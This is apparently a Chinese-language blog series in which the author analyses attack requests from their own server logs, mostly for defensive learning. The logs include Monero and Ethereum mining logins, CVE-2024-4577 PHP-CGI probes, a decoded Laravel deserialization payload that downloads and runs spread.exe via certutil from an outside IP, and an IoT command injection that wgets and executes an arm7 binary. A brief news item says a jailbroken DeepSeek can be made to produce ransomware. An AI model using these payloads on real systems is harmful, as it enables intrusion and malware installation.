從 Web Log 學習系統漏洞 96

從西班牙來的傢伙進行加密貨幣挖礦攻擊(Cryptojacking), 攻擊者試圖利用我的伺服器來挖掘Monero (XMR)、以太坊 (ETH)等加密貨幣

以下這些請求來自挖礦軟體, 它們試圖連接我的伺服器並訂閱到一個挖礦池

195.170.172.128 - - [30/Mar/2025:17:15:57 +0800] "\x16\x03\x01\x02" 400 226 "-" "-"

195.170.172.128 - - [30/Mar/2025:17:15:58 +0800] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n" 400 226 "-" "-"

195.170.172.128 - - [30/Mar/2025:17:16:00 +0800] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n" 400 226 "-" "-"

以下是以太坊挖礦協議(Ethereum Stratum)的一部分, 攻擊者嘗試登入他們的以太坊挖礦帳戶, 並使用我的伺服器作為算力來源

195.170.172.128 - - [30/Mar/2025:17:16:01 +0800] "{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"igwrcvap\",\"params\":[\"0x044b879a07547d75de1f3bf0b35a9185d8db4c59\",\"x\"],\"jsonrpc\":\"2.0\"}\n" 400 226 "-" "-"

以下是 Monero(XMR)挖礦軟體 XMRig嘗試登入請求, 攻擊者試圖讓伺服器開始為他們挖礦

195.170.172.128 - - [30/Mar/2025:17:16:03 +0800] "{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"4AXkveLwwqn72xdjbC5ANKF4SypYA4nzKKZo4msYkbotMVFANkRQ2Bsa8aJqncbahb5Z1x11V7ZZiRMThZn2DRhrV3iqmpv\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n" 400 226 "-" "-"

只能封鎖 IP 跟關閉 port: 3333、4444

從 Web Log 學習系統漏洞 95

來自不同的地方(烏茲別克、印度、哈薩克、俄羅斯、土庫曼、象牙海岸)作大量相同攻擊, 可能是同一人或組織

84.54.70.166 - - [28/Mar/2025:19:28:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

103.1.103.81 - - [28/Mar/2025:19:55:28 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

95.59.244.0 - - [28/Mar/2025:20:01:34 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

188.232.103.100 - - [28/Mar/2025:20:06:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

185.69.185.169 - - [28/Mar/2025:20:09:15 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

213.230.120.119 - - [28/Mar/2025:20:15:46 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

95.59.244.0 - - [28/Mar/2025:20:21:17 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

41.207.204.167 - - [28/Mar/2025:21:30:40 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

49.47.129.57 - - [28/Mar/2025:22:41:33 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

經估狗大神解疑, 這是 CVE-2024-4577, 針對 Windows系統的 XAMPP架站套件裡的 PHP-CGI漏洞作注入式指令遠端攻擊 (比較好奇的是怎麼會有 0 的 IP ?)

從 Web Log 學習系統漏洞 94

weblog上一段來自台灣 IP: 1.163.243.200 的攻擊: 

1.163.243.200 - - [14/Mar/2025:19:46:40 +0800] "GET /public/index.php/index?code=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A2%3A%22cmd.exe+%2Fc+certutil+-urlcache+-split+-f+http%3A%2F%2F26.99.153.102%3A19490%2Fspread.txt+C%3A%5CProgramData%5Cspread.exe+%26%26+C%3A%5CProgramData%5Cspread.exe%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7D HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1"

經解碼後得到:

/public/index.php/index?code=O:44:"Illuminate\Foundation\Testing\PendingCommand":4:{s:10:"*command";s:6:"system";s:13:"*parameters";a:1:{i:0;s:2:"cmd.exe /c certutil -urlcache -split -f http://26.99.153.102:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe";}s:6:"*app";O:33:"Illuminate\Foundation\Application":2:{s:22:"*hasBeenBootstrapped";b:0;s:11:"*bindings";a:1:{s:35:"Illuminate\Contracts\Console\Kernel";a:1:{s:8:"concrete";s:33:"Illuminate\Foundation\Application";}}}s:4:"test";O:27:"Illuminate\Auth\GenericUser":1:{s:13:"*attributes";a:2:{s:14:"expectedOutput";a:1:{i:0;s:1:"1";}s:17:"expectedQuestions";a:1:{i:0;s:1:"1";}}}}

詢問估狗大神後得知這是一個 CVE-2019-9081 Laravel 反序列化漏洞攻擊, Laravel是一個開源的 PHP Web 框架, 攻擊者可能利用未受信任的反序列化觸發 __destruct(), 進而執行 Artisan指令或系統命令導致遠端代碼執行(RCE), 要防範這類攻擊則建議避免使用 unserialize() 解析外部輸入, 並檢查應用程式是否存在未受信任的反序列化點, 升級 Laravel

中國藍芽晶片疑含有後門漏洞程式

西班牙資安業者 Tarlogic Security發現, 由中國一家科技公司製造生產支援藍牙與 Wi-Fi的 ESP32微控制器晶片含有未被公開的指令, 可被駭客用來執行攻擊行動, 這些未公開指令被編號 CVE-2025-27840漏洞, 可允許駭客修改晶片以解鎖其它功能, 植入惡意程式, 或是進行裝置身分竊盜攻擊, 可被用於冒充受信任裝置、未授權存取資料、攻擊網路上的其他設備, 並可能建立長期持續性的攻擊

從 Web Log 學習系統漏洞 93

91.224.92.10 - - [20/Feb/2025:16:17:56 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 534 "-" "Mozila/5.0"

91.224.92.10 - - [20/Feb/2025:16:22:58 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 534 "-" "Mozila/5.0"

來自英國 91.224.92.10 的入侵者:

DeepSeek恐將用戶輸入資料傳至中國

有許多資安專家指出 DeepSeek若進行越獄(修改使用權限), 可使這款 AI模型能產生惡意輸出的內容, 例如開發勒索軟體、偽造幾可亂真的敏感資訊, 另外也有人指出 DeepSeek疑似與中國國營電信業者串連, 擅自建置能將用戶資料傳送給中國移動電信, 而可能讓中國政府直接存取相關資料, 不只可能對使用者收集帳密資料、聊天內容、上傳的檔案, 甚至還會進行即時監控特定使用者活動

2025 農曆新年 Google小遊戲 貪食蛇

貪食蛇, 舊手機時代的懷舊遊戲搬上網頁, 隨著不同的設定, 遊戲也有不同的變化